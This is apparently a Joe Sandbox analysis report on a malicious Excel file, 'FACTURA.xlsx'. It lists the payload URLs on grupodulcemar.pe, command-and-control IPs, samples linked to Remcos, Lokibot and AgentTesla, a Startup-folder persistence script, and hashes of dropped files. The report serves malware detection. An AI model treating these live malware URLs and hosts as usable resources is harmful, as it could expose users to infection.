https://secure.comodo.com/CPS0 | EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.grupodulcemar.pe/HKP098767890HJ.exej | EQNEDT32.EXE, 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.grupodulcemar.pe/m | EQNEDT32.EXE, 00000002.00000002.456047137.000000000066B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.grupodulcemar.pe/HKP098767890HJ.exek | EQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
161.132.57.101 | grupodulcemar.pe | Peru | | 3132 | RedCientificaPeruanaPE | true
192.210.150.26 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1572126
                                    Start date and time:2024-12-10 07:03:18 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 10m 55s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:40
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:FACTURA.xlsx
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLSX@73/75@1/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 71
                                    • Number of non-executed functions: 272
                                    Cookbook Comments:
                                    • Found application associated with file extension: .xlsx
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Active ActiveX Object
                                    • Scroll down
                                    • Close Viewer
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:04:52 | API Interceptor | 144x Sleep call for process: EQNEDT32.EXE modified
01:05:09 | API Interceptor | 6x Sleep call for process: wscript.exe modified
22:05:00 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
161.132.57.101 | FACTURA9876567800.docx.doc | Get hash | malicious | Lokibot | Browse | www.grupodulcemar.pe/FACTURA09876567000.bat
192.210.150.26 | 7056ZCiFdE.exe | Get hash | malicious | Remcos | Browse |
192.210.150.26 | uIarPolvHR.exe | Get hash | malicious | Remcos | Browse |
192.210.150.26 | IB9876789000.bat.exe | Get hash | malicious | Remcos | Browse |
192.210.150.26 | z49FACTURA-0987678.exe | Get hash | malicious | Remcos | Browse |
192.210.150.26 | FAT6789098700900.scr.exe | Get hash | malicious | Remcos | Browse |
192.210.150.26 | Rgh99876k7e.exe | Get hash | malicious | Remcos | Browse |
192.210.150.26 | SALKI098765R400.exe | Get hash | malicious | Remcos | Browse |
192.210.150.26 | FTE98767800000.bat.exe | Get hash | malicious | Remcos | Browse |
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
RedCientificaPeruanaPE | sh4.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 161.132.169.85
RedCientificaPeruanaPE | powerpc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 200.1.176.62
RedCientificaPeruanaPE | FACTURA9876567800.docx.doc | Get hash | malicious | Lokibot | Browse | 161.132.57.101
RedCientificaPeruanaPE | 8UUxoKYpTx.elf | Get hash | malicious | Mirai | Browse | 209.45.71.128
RedCientificaPeruanaPE | arm5.elf | Get hash | malicious | Unknown | Browse | 161.132.159.203
RedCientificaPeruanaPE | 20508667001 Envo de Comprobante de Documento Electrnico FB13-13344615.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 161.132.57.102
RedCientificaPeruanaPE | PO 28014399.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 161.132.57.102
RedCientificaPeruanaPE | Orden de Compra No. 00501.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 161.132.57.102
RedCientificaPeruanaPE | PO 28014399.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 161.132.57.102
RedCientificaPeruanaPE | Factura_N21_092680370923.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 161.132.57.102
AS-COLOCROSSINGUS | Orden_de_Compra_Nmero_6782929219.xls | Get hash | malicious | HTMLPhisher | Browse | 172.245.142.60
AS-COLOCROSSINGUS | OrderSheet.xla.xlsx | Get hash | malicious | Unknown | Browse | 172.245.123.29
AS-COLOCROSSINGUS | OrderSheet.xla.xlsx | Get hash | malicious | Unknown | Browse | 172.245.123.29
AS-COLOCROSSINGUS | OrderSheet.xla.xlsx | Get hash | malicious | Unknown | Browse | 172.245.123.29
AS-COLOCROSSINGUS | Need Price Order No.17084 PARLOK.exe | Get hash | malicious | FormBook | Browse | 104.168.7.16
AS-COLOCROSSINGUS | 7056ZCiFdE.exe | Get hash | malicious | Remcos | Browse | 192.210.150.26
AS-COLOCROSSINGUS | uIarPolvHR.exe | Get hash | malicious | Remcos | Browse | 192.210.150.26
AS-COLOCROSSINGUS | IB9876789000.bat.exe | Get hash | malicious | Remcos | Browse | 192.210.150.26
AS-COLOCROSSINGUS | meerkat.x86.elf | Get hash | malicious | Mirai | Browse | 104.168.61.38
AS-COLOCROSSINGUS | CGDL.doc | Get hash | malicious | Unknown | Browse | 192.3.172.208
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
7dcce5b76c8b17472d024758970a406b | Estado_de_cuenta.xls | Get hash | malicious | AveMaria, UACMe | Browse | 161.132.57.101
7dcce5b76c8b17472d024758970a406b | Orden_de_Compra_Nmero_6782929219.xls | Get hash | malicious | HTMLPhisher | Browse | 161.132.57.101
7dcce5b76c8b17472d024758970a406b | OrderSheet.xla.xlsx | Get hash | malicious | Unknown | Browse | 161.132.57.101
7dcce5b76c8b17472d024758970a406b | plb2ptcqcI.doc | Get hash | malicious | XenoRAT | Browse | 161.132.57.101
7dcce5b76c8b17472d024758970a406b | OrderSheet.xla.xlsx | Get hash | malicious | Unknown | Browse | 161.132.57.101
7dcce5b76c8b17472d024758970a406b | Potvrda_o_uplati.docx.doc | Get hash | malicious | Unknown | Browse | 161.132.57.101
7dcce5b76c8b17472d024758970a406b | dHrrqccwkL.doc | Get hash | malicious | XenoRAT | Browse | 161.132.57.101
7dcce5b76c8b17472d024758970a406b | zVUq6L4FrV.doc | Get hash | malicious | XenoRAT | Browse | 161.132.57.101
7dcce5b76c8b17472d024758970a406b | Estado de cuenta.xls | Get hash | malicious | XenoRAT | Browse | 161.132.57.101
7dcce5b76c8b17472d024758970a406b | Estado de cuenta.xls | Get hash | malicious | Unknown | Browse | 161.132.57.101
                                                    No context
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):832512
                                                    Entropy (8bit):7.982751682789903
                                                    Encrypted:false
                                                    SSDEEP:24576:Erl6kD68JmlotQfXTwzecW/wCyFbxXdRC:yl328U2yfdcZFFd
                                                    MD5:D6B16370CD4E60185AA88607316A0C05
                                                    SHA1:7FBC63B1203617C67E5491745BEAEDB424BAED78
                                                    SHA-256:A6D6D1C8299F97F966D72373E999B5A8E6768914E27D5533307CF6878B95DCE2
                                                    SHA-512:16C468948E568343AB1A1460D82B4C5859D09043E3A0115AA9C0AEFEABFA22C796CCA505EDE8B1F194764DDA7C5263979230E3FA272EE1FB3B21919202B01906
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):169096
                                                    Entropy (8bit):3.369564690022728
                                                    Encrypted:false
                                                    SSDEEP:1536:WK83moqvL5TWvyvcSg2JjEeSxqLY5ml1re71NmWqnb11ruEA9TAe:WF3H2t4Sg2JjEWE5mSZB
                                                    MD5:DCF8C56CAB759D132AD0B11703B8015C
                                                    SHA1:C656AF02D26A18CE716A28C36B34BEE75D00E2B4
                                                    SHA-256:38F17A599AC5D645DF3840BBB401710EF81573A747DA20ABBFC1B7D9A9273B58
                                                    SHA-512:F6A9BAEA096279DBDBFD370B26899D259ED6B6DAFA8042594389523EA210CBECDC14ADD78AB7568E1C3EC8C0DF7AFCCAAD0ED7E22A879F6023C8317B6712973C
                                                    Malicious:false
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
                                                    SHA1:8D032538C2D78C4524A7AC91F71EA241653F6EC2
                                                    SHA-256:29EA00B8682E7C041C9545B37768B8A46E49D45B9B12272C56482B0641F17679
                                                    SHA-512:9F890F3F32B82997586DAA68DFA8FF2F60B2B2CCC5F981A96C3631A608896760BFA16811C9DDF741900F9BE097B93C5CE1DC4B36868F449F798386266C984FE3
                                                    Malicious:false
                                                    Preview:EA06..D..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):435344
                                                    Entropy (8bit):7.985285570664101
                                                    Encrypted:false
                                                    SSDEEP:12288:oZL9vHLfSDwwn/e/p+ODRJSKLsOOTuFXqXHd:o15HLSDh/Yp+ODRLbH8Hd
                                                    MD5:3F524A7F28B5AED776676A99EE1B7A67
                                                    SHA1:0E475D260EF5B7D3C66F38F94ABCA739FD1DB608
                                                    SHA-256:9315316D663AB61E13730C807F2F74B79588796C87353AA084500FEDF2E7E4F2
                                                    SHA-512:6C317C04A10EF103CE572FE3902CA007308DF4A300F617BA4298EE965026B85BBD470B67ED55919237102F10DD0B3BFBDC47D1EB2DC6ADDC443F412FE79BFFD7
                                                    Malicious:false
                                                    Preview:EA06......4.Z.B.E...T.n.a9..T...U.M&Uj.J.N.Mk@....x.Q......f...z.0..)..\..K......z.f...)-..U.N..imF.4..,.y5.}G.D*....d...U..r.W.\....}}..w...z..../E8.F.?..?s<..4.xo.iN.Fv9k.+K........Q4..7....f6{8^ow.{y......h...^..b.nr7.......7p_^.G...=0?w..t.p.q....o...q....*......-Y.3*.Z.S.V.........NsJ...SY..ev...V.]..5....i..qr....!..eV....U..4.,.&.R.S.K10.V.Ujt.kZ..-5*d....8.V...V.P.Q...d.....| 0..E..(T...m9...|..f.gC..<...T.Y....k5.U.p...:=A..&...~'7.L% ..e7.T@..D..@%...X......N.4.M.....Q...|.....1..*`...&.x..Zh...<|...[....dRp....<+ %...x...>......M*.Y..eK.....$.Z.........u...@<>......0.....U.eF.d..y..M...m.|\....i.S..BY...ZJM.g9.dq}.U...N.Ui..u..wg..=...C;S.............U.Ui7...k 1...+.L0..}....J.Ju..o.Q..j...Co.Zgj.?...].=.o...&.(~g...].*...5...z7bs{.._J.K.\.]j.*..0..'../wWe...<.....n9.I.ru;.Z3.p.._5.P.wZ7c.|.L.rZ.^...Ej..^W.Gj...B.K.wY.....M...f....s...E.z..s@...O..\&...ni2.Gg.:wb.}..#.o.....U...E..i..-RI.2E...{..m2e..."....!4.C>..Z;R.C..Z..C(.P.
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14748
                                                    Entropy (8bit):7.621191303647537
                                                    Encrypted:false
                                                    SSDEEP:384:pTYznw85HhH2x2ZHDYn8oj/rFwGn1TFioPl:pAw83kCmPjJwG1jl
                                                    MD5:F6FD31D1FA46BDE50DC3C6A4A25228FF
